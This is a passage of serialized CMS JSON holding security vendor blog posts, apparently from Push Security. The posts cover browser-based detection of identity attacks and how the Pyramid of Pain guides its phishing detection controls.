because:",[],{},{"nodeType":250,"data":74250,"content":74251},{},[74252,74262,74272],{"nodeType":254,"data":74253,"content":74254},{},[74255],{"nodeType":178,"data":74256,"content":74257},{},[74258],{"nodeType":173,"value":74259,"marks":74260,"data":74261},"You aren’t limited to the apps and identities directly connected to your IdP (a fraction of your workforce identity sprawl). ",[],{},{"nodeType":254,"data":74263,"content":74264},{},[74265],{"nodeType":178,"data":74266,"content":74267},{},[74268],{"nodeType":173,"value":74269,"marks":74270,"data":74271},"You aren’t limited to the apps that you know about and manage centrally — you can observe every login that passes through the browser.",[],{},{"nodeType":254,"data":74273,"content":74274},{},[74275],{"nodeType":178,"data":74276,"content":74277},{},[74278,74282,74286],{"nodeType":173,"value":74279,"marks":74280,"data":74281},"You can observe all the properties of a login, including the login method, MFA method, etc. You’d otherwise need API access to ",[],{},{"nodeType":173,"value":62931,"marks":74283,"data":74285},[74284],{"type":1646},{},{"nodeType":173,"value":74287,"marks":74288,"data":74289}," get this information (depending on whether an API is provided and whether this specific data can be interrogated, also not standard for many apps). ",[],{},{"nodeType":178,"data":74291,"content":74292},{},[74293,74297,74302,74306,74314],{"nodeType":173,"value":74294,"marks":74295,"data":74296},"It’s obvious with all that we’ve covered so far that fixing every identity vulnerability is an ominous task — the SaaS ecosystem itself is working against you. ",[],{},{"nodeType":173,"value":74298,"marks":74299,"data":74301},"This is why detecting and responding to identity attacks is essential. ",[74300],{"type":370},{},{"nodeType":173,"value":74303,"marks":74304,"data":74305},"Because identity compromise almost always involves phishing or social engineering a user to perform an action in their browser (with some exceptions — like the ",[],{},{"nodeType":186,"data":74307,"content":74308},{"uri":1034},[74309],{"nodeType":173,"value":74310,"marks":74311,"data":74313},"Scattered Spider-related help desk attacks",[74312],{"type":194},{},{"nodeType":173,"value":74315,"marks":74316,"data":74317}," seen recently), it’s also the perfect place to monitor for and intercept attacks. ",[],{},{"nodeType":178,"data":74319,"content":74320},{},[74321],{"nodeType":173,"value":74322,"marks":74323,"data":74324},"In the browser, you gather deep, contextualized information about page behavior and user inputs that can be used to detect and shut down risky scenarios in real time. Take the example of phishing pages. Because Push operates in the browser, it sees everything:",[],{},{"nodeType":250,"data":74326,"content":74327},{},[74328,74338,74348,74358,74381,74391],{"nodeType":254,"data":74329,"content":74330},{},[74331],{"nodeType":178,"data":74332,"content":74333},{},[74334],{"nodeType":173,"value":74335,"marks":74336,"data":74337},"The page layout.",[],{},{"nodeType":254,"data":74339,"content":74340},{},[74341],{"nodeType":178,"data":74342,"content":74343},{},[74344],{"nodeType":173,"value":74345,"marks":74346,"data":74347},"Where the user came from (through the whole redirect chain).",[],{},{"nodeType":254,"data":74349,"content":74350},{},[74351],{"nodeType":178,"data":74352,"content":74353},{},[74354],{"nodeType":173,"value":74355,"marks":74356,"data":74357},"Page interaction events — e.g. tabs opened and closed, popup windows, forms submitted, etc.",[],{},{"nodeType":254,"data":74359,"content":74360},{},[74361],{"nodeType":178,"data":74362,"content":74363},{},[74364,74368,74377],{"nodeType":173,"value":74365,"marks":74366,"data":74367},"The password they enter ",[],{},{"nodeType":186,"data":74369,"content":74371},{"uri":74370},"https://pushsecurity.com/help/10043/#how-push-securely-analyzes-passwords",[74372],{"nodeType":173,"value":74373,"marks":74374,"data":74376},"(as a salted, abbreviated hash)",[74375],{"type":194},{},{"nodeType":173,"value":74378,"marks":74379,"data":74380},", and whether a password was typed or copied, and where from.",[],{},{"nodeType":254,"data":74382,"content":74383},{},[74384],{"nodeType":178,"data":74385,"content":74386},{},[74387],{"nodeType":173,"value":74388,"marks":74389,"data":74390},"What scripts are running on the page and whether they are potentially malicious.",[],{},{"nodeType":254,"data":74392,"content":74393},{},[74394],{"nodeType":178,"data":74395,"content":74396},{},[74397],{"nodeType":173,"value":74398,"marks":74399,"data":74400},"Where credentials are being sent.",[],{},{"nodeType":312,"data":74402,"content":74406},{"target":74403},{"sys":74404},{"id":74405,"type":317,"linkType":318},"6kQejVS63FQ6Oy8nIm6UlV",[],{"nodeType":231,"data":74408,"content":74409},{},[],{"nodeType":169,"data":74411,"content":74412},{},[74413],{"nodeType":173,"value":40632,"marks":74414,"data":74416},[74415],{"type":370},{},{"nodeType":178,"data":74418,"content":74419},{},[74420],{"nodeType":173,"value":74421,"marks":74422,"data":74423},"Identity attacks are the biggest unsolved problem facing security teams today and the leading cause of security breaches. At the same time, the browser presents security teams with all the tools they need to prevent, detect, and respond to identity-based attacks — proactively by finding and fixing identity vulnerabilities, and reactively by detecting and blocking attacks against users in real time. ",[],{},{"nodeType":178,"data":74425,"content":74426},{},[74427,74431,74440],{"nodeType":173,"value":74428,"marks":74429,"data":74430},"Organizations need to move past the old ways of doing identity security — relying on MFA attestations, identity management dashboards, and ",[],{},{"nodeType":186,"data":74432,"content":74434},{"uri":74433},"https://pushsecurity.com/blog/three-reasons-why-browser-is-best-for-stopping-phishing-attacks/",[74435],{"nodeType":173,"value":74436,"marks":74437,"data":74439},"legacy email and network anti-phishing tools",[74438],{"type":194},{},{"nodeType":173,"value":74441,"marks":74442,"data":74443},". And there’s no better place to stop these attacks than in the browser. ",[],{},{"nodeType":231,"data":74445,"content":74446},{},[],{"nodeType":169,"data":74448,"content":74449},{},[74450],{"nodeType":173,"value":71801,"marks":74451,"data":74453},[74452],{"type":370},{},{"nodeType":178,"data":74455,"content":74456},{},[74457],{"nodeType":173,"value":74458,"marks":74459,"data":74460},"Push Security’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks identity attacks like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more.",[],{},{"nodeType":178,"data":74462,"content":74463},{},[74464,74467,74474],{"nodeType":173,"value":59468,"marks":74465,"data":74466},[],{},{"nodeType":186,"data":74468,"content":74469},{"uri":1469},[74470],{"nodeType":173,"value":1472,"marks":74471,"data":74473},[74472],{"type":194},{},{"nodeType":173,"value":1477,"marks":74475,"data":74476},[],{},"How the browser became the main cyber battleground","How attacks have moved away from endpoints and internal networks to the browser — a blind spot for traditional security tools.","2025-08-15T00:00:00.000Z","how-the-browser-became-the-main-cyber-battleground",{"items":74482},[74483,74485],{"sys":74484,"name":509},{"id":508},{"sys":74486,"name":505},{"id":504},{"items":74488},[74489],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":74490},{"url":1496},{"__typename":1528,"sys":74492,"content":74494,"title":75144,"synopsis":75145,"hashTags":118,"publishedDate":75146,"slug":75147,"tagsCollection":75148,"authorsCollection":75154},{"id":74493},"1qegIy4rMdm5XZXnIEoKpE",{"json":74495},{"nodeType":165,"data":74496,"content":74497},{},[74498,74505,74512,74537,74543,74550,74557,74560,74567,74587,74593,74600,74642,74649,74656,74663,74670,74677,74684,74703,74711,74714,74721,74728,74735,74742,74749,74756,74763,74811,74818,74825,74832,74852,74859,74866,74873,74880,74887,74894,74901,74918,74935,74978,74985,74992,75057,75064,75067,75074,75090,75109,75116,75122,75128,75131,75137],{"nodeType":178,"data":74499,"content":74500},{},[74501],{"nodeType":173,"value":74502,"marks":74503,"data":74504},"The field of threat detection and security monitoring has changed significantly over the last decade. Security tools and product categories have been added and replaced, specialist disciplines established, and methodologies created. ",[],{},{"nodeType":178,"data":74506,"content":74507},{},[74508],{"nodeType":173,"value":74509,"marks":74510,"data":74511},"Naturally, defenders have had to mature their approach because of the changing nature of the threat facing organizations. Attackers have always looked for new ways to target their victims, and naturally, defenders have had to adapt, forcing attackers to change things up… it’s a cat and mouse game. ",[],{},{"nodeType":178,"data":74513,"content":74514},{},[74515,74519,74528,74532],{"nodeType":173,"value":74516,"marks":74517,"data":74518},"Blue teamers have used the concept of the ",[],{},{"nodeType":186,"data":74520,"content":74522},{"uri":74521},"https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html",[74523],{"nodeType":173,"value":74524,"marks":74525,"data":74527},"Pyramid of Pain",[74526],{"type":194},{},{"nodeType":173,"value":74529,"marks":74530,"data":74531}," for over a decade. The logic is simple: ",[],{},{"nodeType":173,"value":74533,"marks":74534,"data":74536},"Focus on detecting and responding to indicators that are hard for attackers to change. ",[74535],{"type":370},{},{"nodeType":312,"data":74538,"content":74542},{"target":74539},{"sys":74540},{"id":74541,"type":317,"linkType":318},"6cG2fx3AikwptyEyXKrYCK",[],{"nodeType":178,"data":74544,"content":74545},{},[74546],{"nodeType":173,"value":74547,"marks":74548,"data":74549},"If an attacker only has to tweak a variable to get around your detection rule, like adding a space to change a hash value, it’s probably not a very good detection. It’s not going to remain effective for long and you’re always going to be one step behind the attacker – waiting for them to make their next move so you can react. This usually ends up meaning that attackers enjoy at least some success before they can be shut out again. ",[],{},{"nodeType":178,"data":74551,"content":74552},{},[74553],{"nodeType":173,"value":74554,"marks":74555,"data":74556},"The Pyramid of Pain – and the goal of implementing hard-to-bypass detections that hit attackers where it hurts – is central to our design philosophy. But before we get into how we apply this approach, and the types of controls we’ve created as a result, it’s useful to look at how IT and security have changed since the Pyramid was created more than a decade ago. ",[],{},{"nodeType":231,"data":74558,"content":74559},{},[],{"nodeType":169,"data":74561,"content":74562},{},[74563],{"nodeType":173,"value":74564,"marks":74565,"data":74566},"A new era for cyber security",[],{},{"nodeType":178,"data":74568,"content":74569},{},[74570,74574,74583],{"nodeType":173,"value":74571,"marks":74572,"data":74573},"We’ve spoken a lot about how we’re in the midst of a new era in cybersecurity, in which identity is now the outermost digital perimeter for security teams to defend. (",[],{},{"nodeType":186,"data":74575,"content":74577},{"uri":74576},"https://pushsecurity.com/resources/video/the-new-saas-cyber-kill-chain-so-con-2024/",[74578],{"nodeType":173,"value":74579,"marks":74580,"data":74582},"You’ll be familiar with this if you’ve seen any of Luke’s talks on the New SaaS Cyber Kill Chain.",[74581],{"type":194},{},{"nodeType":173,"value":74584,"marks":74585,"data":74586},") ",[],{},{"nodeType":312,"data":74588,"content":74592},{"target":74589},{"sys":74590},{"id":74591,"type":317,"linkType":318},"6nYSZAYpsbj78jKm0q75zs",[],{"nodeType":178,"data":74594,"content":74595},{},[74596],{"nodeType":173,"value":74597,"marks":74598,"data":74599},"This is primarily because modern working is no longer contained to a heavily centralized corporate network, and instead happens primarily in applications accessed over the internet via web browser.",[],{},{"nodeType":178,"data":74601,"content":74602},{},[74603,74607,74615,74619,74627,74631,74638],{"nodeType":173,"value":74604,"marks":74605,"data":74606},"In this new world, attacks don’t even have to touch the old perimeters, because all the data and functionality they could want exists on the public internet. As a result, we’re seeing more and more ",[],{},{"nodeType":186,"data":74608,"content":74610},{"uri":74609},"https://pushsecurity.com/blog/saas-attack-techniques/",[74611],{"nodeType":173,"value":74612,"marks":74613,"data":74614},"attacks targeting SaaS apps",[],{},{"nodeType":173,"value":74616,"marks":74617,"data":74618},", with the entire attack chain being concluded outside customer networks, not touching any traditional endpoints or networks. The ",[],{},{"nodeType":186,"data":74620,"content":74622},{"uri":74621},"https://pushsecurity.com/blog/identity-attacks-in-the-wild/#id-snowflake-june-2024",[74623],{"nodeType":173,"value":74624,"marks":74625,"data":74626},"recent attacks on Snowflake customers",[],{},{"nodeType":173,"value":74628,"marks":74629,"data":74630},", hailed ",[],{},{"nodeType":186,"data":74632,"content":74633},{"uri":3999},[74634],{"nodeType":173,"value":74635,"marks":74636,"data":74637},"one of the biggest breaches in history",[],{},{"nodeType":173,"value":74639,"marks":74640,"data":74641},", demonstrate this risk all too well. ",[],{},{"nodeType":178,"data":74643,"content":74644},{},[74645],{"nodeType":173,"value":74646,"marks":74647,"data":74648},"This creates a problem for security teams looking to detect and respond to these attacks. ",[],{},{"nodeType":235,"data":74650,"content":74651},{},[74652],{"nodeType":173,"value":74653,"marks":74654,"data":74655},"Attacks today are shorter and faster, but just as dangerous",[],{},{"nodeType":178,"data":74657,"content":74658},{},[74659],{"nodeType":173,"value":74660,"marks":74661,"data":74662},"Detecting and responding to identity attacks – phishing, credential stuffing, etc. – used to be just one possible method of initial access in quite a lengthy Kill Chain that stretched from the compromise of the user device, pivoting to internal network resources, escalating privileges, moving laterally, and finally achieving their objectives.",[],{},{"nodeType":178,"data":74664,"content":74665},{},[74666],{"nodeType":173,"value":74667,"marks":74668,"data":74669},"This meant that defenders could adopt an assumed compromise mentality and build layered detections, as well as proactively hunting for threats across these various stages and layers of the network. The more actions an attacker has to perform, the more opportunities for detection, and the higher the likelihood that they’ll be caught in the act before any real, lasting damage can be caused. ",[],{},{"nodeType":178,"data":74671,"content":74672},{},[74673],{"nodeType":173,"value":74674,"marks":74675,"data":74676},"Today, attackers have a lot of opportunities to cause significant damage for much less effort than before. For example, if the goal is to compromise an app like Snowflake and dump the data from it, the Kill Chain is way shorter than a traditional network-based attack. And all the great tools and security products you have, like EDR, don’t come into play. ",[],{},{"nodeType":178,"data":74678,"content":74679},{},[74680],{"nodeType":173,"value":74681,"marks":74682,"data":74683},"This means that the initial layer of anti-account takeover controls are much more important in this context. But, the historical detections in this space – email gateway security products, analyzing web pages for malicious content, and URL blocklisting – are either less relevant, or built upon easy to bypass detections toward the bottom of the Pyramid of Pain. ",[],{},{"nodeType":178,"data":74685,"content":74686},{},[74687,74691,74699],{"nodeType":173,"value":74688,"marks":74689,"data":74690},"As an example, ",[],{},{"nodeType":186,"data":74692,"content":74694},{"uri":74693},"https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection/",[74695],{"nodeType":173,"value":74696,"marks":74697,"data":74698},"we recently published an article on all the ways that AitM phishing sites are evading detection",[],{},{"nodeType":173,"value":74700,"marks":74701,"data":74702},". TL;DR – there are a lot, and they seem to be quite effective. But this is partly because the majority of the detections they're trying to avoid are built on shaky ground.   ",[],{},{"nodeType":178,"data":74704,"content":74705},{},[74706],{"nodeType":173,"value":74707,"marks":74708,"data":74710},"So what? Well, it’s clear that the controls that the industry has relied on in the past to stop identity attacks are too easy to bypass, and are no longer sufficient. ",[74709],{"type":370},{},{"nodeType":231,"data":74712,"content":74713},{},[],{"nodeType":169,"data":74715,"content":74716},{},[74717],{"nodeType":173,"value":74718,"marks":74719,"data":74720},"Building effective identity threat detection controls",[],{},{"nodeType":178,"data":74722,"content":74723},{},[74724],{"nodeType":173,"value":74725,"marks":74726,"data":74727},"Now we’ve covered the problem that we set out to solve, let’s look at what we’re doing differently. ",[],{},{"nodeType":178,"data":74729,"content":74730},{},[74731],{"nodeType":173,"value":74732,"marks":74733,"data":74734},"In order to climb the Pyramid toward the apex, you need to find ways to detect increasingly generic parts of an attack technique. So you want to avoid things like what a specific malware’s code looks like, or where it connects back to. But what the malware does, or what happens when it runs, is more generic, and therefore more interesting to us.  ",[],{},{"nodeType":178,"data":74736,"content":74737},{},[74738],{"nodeType":173,"value":74739,"marks":74740,"data":74741},"The shift from static code signatures and fuzzy hashes to dynamic analysis of what code does on a live system is at the heart of why EDR killed antivirus a decade ago. It proved at-scale the value of moving detections up the pyramid.",[],{},{"nodeType":178,"data":74743,"content":74744},{},[74745],{"nodeType":173,"value":74746,"marks":74747,"data":74748},"We’re always on the lookout for ways to move our detections up the pyramid as well. It’s easiest to explain how we’ve applied this by looking at an example. ",[],{},{"nodeType":235,"data":74750,"content":74751},{},[74752],{"nodeType":173,"value":74753,"marks":74754,"data":74755},"Scenario: Detecting a web-based phishing attack",[],{},{"nodeType":178,"data":74757,"content":74758},{},[74759],{"nodeType":173,"value":74760,"marks":74761,"data":74762},"Let’s break down the stages of a web-based phishing attack as an example. For a user to be successfully phished:",[],{},{"nodeType":250,"data":74764,"content":74765},{},[74766,74781,74796],{"nodeType":254,"data":74767,"content":74768},{},[74769],{"nodeType":178,"data":74770,"content":74771},{},[74772,74777],{"nodeType":173,"value":74773,"marks":74774,"data":74776},"Stage 1:",[74775],{"type":370},{},{"nodeType":173,"value":74778,"marks":74779,"data":74780}," The victim must be lured to visit a website.",[],{},{"nodeType":254,"data":74782,"content":74783},{},[74784],{"nodeType":178,"data":74785,"content":74786},{},[74787,74792],{"nodeType":173,"value":74788,"marks":74789,"data":74791},"Stage 2:",[74790],{"type":370},{},{"nodeType":173,"value":74793,"marks":74794,"data":74795}," The website must somehow trick or convince the user that it’s legitimate and trustworthy, for example by mimicking a legitimate site.",[],{},{"nodeType":254,"data":74797,"content":74798},{},[74799],{"nodeType":178,"data":74800,"content":74801},{},[74802,74807],{"nodeType":173,"value":74803,"marks":74804,"data":74806},"Stage 3:",[74805],{"type":370},{},{"nodeType":173,"value":74808,"marks":74809,"data":74810}," The user must enter their actual credentials into that website.",[],{},{"nodeType":178,"data":74812,"content":74813},{},[74814],{"nodeType":173,"value":74815,"marks":74816,"data":74817},"So, how might you go about detecting this attack? Let’s start from the bottom of the pyramid and work our way up.",[],{},{"nodeType":235,"data":74819,"content":74820},{},[74821],{"nodeType":173,"value":74822,"marks":74823,"data":74824},"Stage 1: Determining if a URL, IP, or domain is bad",[],{},{"nodeType":178,"data":74826,"content":74827},{},[74828],{"nodeType":173,"value":74829,"marks":74830,"data":74831},"You might start by looking for the lure – historically an email. You could look for links in emails, or links in attachments in an email and then check if they are bad (which is essentially what email security products do). You could look for known-bad URLs in emails, but these change for every phishing campaign. In modern attacks, every target can receive a unique email and link. Even just using a URL shortener can bypass this. It’s equivalent to a malware hash – trivial to change, and therefore not a great thing to pin your detections on. ",[],{},{"nodeType":178,"data":74833,"content":74834},{},[74835,74839,74848],{"nodeType":173,"value":74836,"marks":74837,"data":74838},"You could look at which IP address the user connects to, but these days it’s very simple for attackers to add a new IP to their cloud-hosted server. If a domain is flagged as known-bad, the attacker only has to register a new domain, or compromise a WordPress server on an already trusted domain. Both of these things are ",[],{},{"nodeType":186,"data":74840,"content":74842},{"uri":74841},"https://www.bleepingcomputer.com/news/security/revolver-rabbit-gang-registers-500-000-domains-for-malware-campaigns/",[74843],{"nodeType":173,"value":74844,"marks":74845,"data":74847},"happening on a massive scale",[74846],{"type":194},{},{"nodeType":173,"value":74849,"marks":74850,"data":74851}," as attackers pre-plan for the fact that their domains will be burned at some point. Attackers are more than happy to spend $10-$20 per new domain in the grand scheme of the potential proceeds of crime. ",[],{},{"nodeType":178,"data":74853,"content":74854},{},[74855],{"nodeType":173,"value":74856,"marks":74857,"data":74858},"But there’s a more fundamental flaw here – for defenders to know that a URL, IP, or domain name is bad, it needs to be reported first. When are things reported? Typically after being used in an attack – so unfortunately, someone always gets hurt.  ",[],{},{"nodeType":235,"data":74860,"content":74861},{},[74862],{"nodeType":173,"value":74863,"marks":74864,"data":74865},"Stage 2: Determining if a site is legitimate",[],{},{"nodeType":178,"data":74867,"content":74868},{},[74869],{"nodeType":173,"value":74870,"marks":74871,"data":74872},"So how can we detect a phishing website, on day-zero, the first time anyone runs into it? Well we can look at the second step – does the URL resemble a real website, does the HTML code for a page look similar to a legitimate login page for a known website, is it loading the same image files? This is not trivial to detect, but with the right fuzzy matches and image analysis it can be automated.",[],{},{"nodeType":178,"data":74874,"content":74875},{},[74876],{"nodeType":173,"value":74877,"marks":74878,"data":74879},"We’ve now moved up a level on the Pyramid – we’re detecting website artifacts. If we see a legitimate looking website on an unknown domain, it’s likely to be a malicious clone.",[],{},{"nodeType":178,"data":74881,"content":74882},{},[74883],{"nodeType":173,"value":74884,"marks":74885,"data":74886},"Unfortunately, the attacker’s website doesn’t need to send each visitor to the same website. It can change dynamically based on where the visitor is coming from – or even randomly, so that not all visitors are served the phishing page. This means that tools which resolve where the links in emails go to be able to analyze them (such as email security appliances) don’t necessarily see the same site the user is actually visiting – a fact that is commonly abused by attackers to bypass detection. It’s critical that detection happens on the actual web page that the victim sees.",[],{},{"nodeType":235,"data":74888,"content":74889},{},[74890],{"nodeType":173,"value":74891,"marks":74892,"data":74893},"Stage 3: Detecting the user entering their credentials",[],{},{"nodeType":178,"data":74895,"content":74896},{},[74897],{"nodeType":173,"value":74898,"marks":74899,"data":74900},"For a phishing attack to succeed, the victim must enter their actual credentials into the webpage. If you can stop the user entering their real password, there’s no attack. There’s no getting around it. ",[],{},{"nodeType":178,"data":74902,"content":74903},{},[74904,74908,74915],{"nodeType":173,"value":74905,"marks":74906,"data":74907},"So, this is exactly what we did: Earlier this year, we released a control which ",[],{},{"nodeType":186,"data":74909,"content":74910},{"uri":9099},[74911],{"nodeType":173,"value":74912,"marks":74913,"data":74914},"stops users from entering their password belonging to a particular login page anywhere else",[],{},{"nodeType":173,"value":1477,"marks":74916,"data":74917},[],{},{"nodeType":178,"data":74919,"content":74920},{},[74921,74925,74932],{"nodeType":173,"value":74922,"marks":74923,"data":74924},"Seems simple, right? By focusing on this generic action, that always has to happen, you can essentially stop your users being phished altogether. This means, it doesn’t matter ",[],{},{"nodeType":186,"data":74926,"content":74927},{"uri":74693},[74928],{"nodeType":173,"value":74929,"marks":74930,"data":74931},"what the attacker does before that point",[],{},{"nodeType":173,"value":39946,"marks":74933,"data":74934},[],{},{"nodeType":250,"data":74936,"content":74937},{},[74938,74948,74958,74968],{"nodeType":254,"data":74939,"content":74940},{},[74941],{"nodeType":178,"data":74942,"content":74943},{},[74944],{"nodeType":173,"value":74945,"marks":74946,"data":74947},"It doesn't matter if they run the site using Cloudflare Workers to block automatic analysis.",[],{},{"nodeType":254,"data":74949,"content":74950},{},[74951],{"nodeType":178,"data":74952,"content":74953},{},[74954],{"nodeType":173,"value":74955,"marks":74956,"data":74957},"It doesn’t matter if they hack a WordPress blog to get a reputable domain.",[],{},{"nodeType":254,"data":74959,"content":74960},{},[74961],{"nodeType":178,"data":74962,"content":74963},{},[74964],{"nodeType":173,"value":74965,"marks":74966,"data":74967},"It doesn’t matter if they use clever redirects and rotate the URLs delivered to the user.",[],{},{"nodeType":254,"data":74969,"content":74970},{},[74971],{"nodeType":178,"data":74972,"content":74973},{},[74974],{"nodeType":173,"value":74975,"marks":74976,"data":74977},"It doesn’t matter if they randomize the HTML title for the web page. ",[],{},{"nodeType":178,"data":74979,"content":74980},{},[74981],{"nodeType":173,"value":74982,"marks":74983,"data":74984},"They can’t avoid the fact that a user is required to enter their credentials on the page for the attack to succeed. ",[],{},{"nodeType":178,"data":74986,"content":74987},{},[74988],{"nodeType":173,"value":74989,"marks":74990,"data":74991},"So, when you apply the Pyramid of Pain to some of the controls we’ve shipped this year, we get a clear feel for the value, from highest to lowest:",[],{},{"nodeType":250,"data":74993,"content":74994},{},[74995,75015,75036],{"nodeType":254,"data":74996,"content":74997},{},[74998],{"nodeType":178,"data":74999,"content":75000},{},[75001,75005,75012],{"nodeType":173,"value":75002,"marks":75003,"data":75004},"User Behavior: ",[],{},{"nodeType":186,"data":75006,"content":75007},{"uri":9099},[75008],{"nodeType":173,"value":75009,"marks":75010,"data":75011},"Detecting and blocking the user behavior of entering their password into any site that the password doesn’t belong to",[],{},{"nodeType":173,"value":197,"marks":75013,"data":75014},[],{},{"nodeType":254,"data":75016,"content":75017},{},[75018],{"nodeType":178,"data":75019,"content":75020},{},[75021,75025,75033],{"nodeType":173,"value":75022,"marks":75023,"data":75024},"Tool Behavior: ",[],{},{"nodeType":186,"data":75026,"content":75028},{"uri":75027},"https://pushsecurity.com/blog/introducing-cloned-login-page-detection/",[75029],{"nodeType":173,"value":75030,"marks":75031,"data":75032},"Detecting when a login page that you access is cloned from a legitimate page.",[],{},{"nodeType":173,"value":37,"marks":75034,"data":75035},[],{},{"nodeType":254,"data":75037,"content":75038},{},[75039],{"nodeType":178,"data":75040,"content":75041},{},[75042,75046,75054],{"nodeType":173,"value":75043,"marks":75044,"data":75045},"Tool Signature: ",[],{},{"nodeType":186,"data":75047,"content":75049},{"uri":75048},"https://pushsecurity.com/blog/introducing-aitm-phishing-toolkit-detection-powered-by-the-push-browser/",[75050],{"nodeType":173,"value":75051,"marks":75052,"data":75053},"Detecting and blocking access to a page with a known phishing kit signature present on the page",[],{},{"nodeType":173,"value":197,"marks":75055,"data":75056},[],{},{"nodeType":178,"data":75058,"content":75059},{},[75060],{"nodeType":173,"value":75061,"marks":75062,"data":75063},"Naturally, we want to continue focusing on the apex of the Pyramid – at TTPs and Tools – to ensure that the controls we build are as robust as possible, and can’t be bypassed by attackers. ",[],{},{"nodeType":231,"data":75065,"content":75066},{},[],{"nodeType":169,"data":75068,"content":75069},{},[75070],{"nodeType":173,"value":75071,"marks":75072,"data":75073},"The power of the Push browser agent",[],{},{"nodeType":178,"data":75075,"content":75076},{},[75077,75081,75086],{"nodeType":173,"value":75078,"marks":75079,"data":75080},"You might ask: ",[],{},{"nodeType":173,"value":75082,"marks":75083,"data":75085},"If it’s so simple, why hasn’t this been done yet?",[75084],{"type":370},{},{"nodeType":173,"value":75087,"marks":75088,"data":75089}," Well, before now, there was no good way of doing it! Teams simply didn’t have tools in the right place to be able to capture the level of data needed, or respond effectively (i.e. automatically, at the point of impact). ",[],{},{"nodeType":178,"data":75091,"content":75092},{},[75093,75097,75105],{"nodeType":173,"value":75094,"marks":75095,"data":75096},"This is where being in the browser comes into play. The browser is a great place to observe the behavior of a page in real time, without needing to reconstruct decrypted HTTP data post-TLS termination and try to guess what the rendered page in all its Javascript-infused glory actually does, ",[],{},{"nodeType":186,"data":75098,"content":75100},{"uri":75099},"https://pushsecurity.com/blog/the-web-proxy-is-dead-long-live-the-browser-extension/",[75101],{"nodeType":173,"value":75102,"marks":75103,"data":75104},"as we’ve blogged about previously",[],{},{"nodeType":173,"value":75106,"marks":75107,"data":75108},". As we’ve seen through the ability to not only detect but prevent phishing attacks, it’s also a great control enforcement point, as you’re able to intercept the user at the point of impact, and you sit as closely as possible to where their work typically happens – in the browser. ",[],{},{"nodeType":178,"data":75110,"content":75111},{},[75112],{"nodeType":173,"value":75113,"marks":75114,"data":75115},"To illustrate how crucial the browser is to implementing controls that sit at the apex of the Pyramid of Pain, we created a modified version designed specifically for identity attacks. ",[],{},{"nodeType":312,"data":75117,"content":75121},{"target":75118},{"sys":75119},{"id":75120,"type":317,"linkType":318},"HrK2xQak6KfjInDbeSgv8",[],{"nodeType":312,"data":75123,"content":75127},{"target":75124},{"sys":75125},{"id":75126,"type":317,"linkType":318},"7kLilJ8Y08smUI9ttM3BSO",[],{"nodeType":231,"data":75129,"content":75130},{},[],{"nodeType":169,"data":75132,"content":75133},{},[75134],{"nodeType":173,"value":40632,"marks":75135,"data":75136},[],{},{"nodeType":178,"data":75138,"content":75139},{},[75140],{"nodeType":173,"value":75141,"marks":75142,"data":75143},"Hopefully, this blog post has shone a light on why we do things the way we do here at Push. The goal of building generic detections that are difficult, painful, and costly for attackers to bypass is a key part of our design strategy, and we look forward to sharing many more controls with you that demonstrate this in the future.",[],{},"Our design philosophy: Detecting what matters","This is the first blog in a short series we’re putting together about the ‘why’ behind the ‘what’ at Push. This entry is focused on threat detection. ","2024-08-05T00:00:00.000Z","our-design-philosophy-detecting-what-matters",{"items":75149},[75150,75152],{"sys":75151,"name":509},{"id":508},{"sys":75153,"name":505},{"id":504},{"items":75155},[75156],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":75157},{"url":1496},{"items":75159},[75160],{"fullName":26724,"firstName":26725,"jobTitle":26726,"profilePicture":75161},{"url":26728},{"json":75163,"links":75578},{"nodeType":165,"data":75164,"content":75165},{},[75166,75172,75178,75181,75187,75214,75224,75244,75250,75253,75259,75265,75271,75276,75282,75308,75313,75319,75335,75340,75346,75351,75354,75360,75389,75395,75434,75440,75445,75451,75457,75460,75466,75472,75478,75494,75499,75505,75511,75517,75522,75528,75533,75536,75542,75548,75554],{"nodeType":178,"data":75167,"content":75168},{},[75169],{"nodeType":173,"value":67335,"marks":75170,"data":75171},[],{},{"nodeType":178,"data":75173,"content":75174},{},[75175],{"nodeType":173,"value":67342,"marks":75176,"data":75177},[],{},{"nodeType":231,"data":75179,"content":75180},{},[],{"nodeType":169,"data":75182,"content":75183},{},[75184],{"nodeType":173,"value":67352,"marks":75185,"data":75186},[],{},{"nodeType":178,"data":75188,"content":75189},{},[75190,75193,75197,75200,75204,75207,75211],{"nodeType":173,"value":67359,"marks":75191,"data":75192},[],{},{"nodeType":173,"value":67363,"marks":75194,"data":75196},[75195],{"type":1646},{},{"nodeType":173,"value":67368,"marks":75198,"data":75199},[],{},{"nodeType":173,"value":67372,"marks":75201,"data":75203},[75202],{"type":370},{},{"nodeType":173,"value":67377,"marks":75205,"data":75206},[],{},{"nodeType":173,"value":67381,"marks":75208,"data":75210},[75209],{"type":370},{},{"nodeType":173,"value":67386,"marks":75212,"data":75213},[],{},{"nodeType":178,"data":75215,"content":75216},{},[75217,75220],{"nodeType":173,"value":67393,"marks":75218,"data":75219},[],{},{"nodeType":173,"value":67397,"marks":75221,"data":75223},[75222],{"type":370},{},{"nodeType":178,"data":75225,"content":75226},{},[75227,75230,75237,75240],{"nodeType":173,"value":67405,"marks":75228,"data":75229},[],{},{"nodeType":186,"data":75231,"content":75232},{"uri":67410},[75233],{"nodeType":173,"value":67413,"marks":75234,"data":75236},[75235],{"type":194},{},{"nodeType":173,"value":67418,"marks":75238,"data":75239},[],{},{"nodeType":173,"value":67422,"marks":75241,"data":75243},[75242],{"type":370},{},{"nodeType":178,"data":75245,"content":75246},{},[75247],{"nodeType":173,"value":67430,"marks":75248,"data":75249},[],{},{"nodeType":231,"data":75251,"content":75252},{},[],{"nodeType":169,"data":75254,"content":75255},{},[75256],{"nodeType":173,"value":67440,"marks":75257,"data":75258},[],{},{"nodeType":178,"data":75260,"content":75261},{},[75262],{"nodeType":173,"value":67447,"marks":75263,"data":75264},[],{},{"nodeType":178,"data":75266,"content":75267},{},[75268],{"nodeType":173,"value":67454,"marks":75269,"data":75270},[],{},{"nodeType":312,"data":75272,"content":75275},{"target":75273},{"sys":75274},{"id":67461,"type":317,"linkType":318},[],{"nodeType":235,"data":75277,"content":75278},{},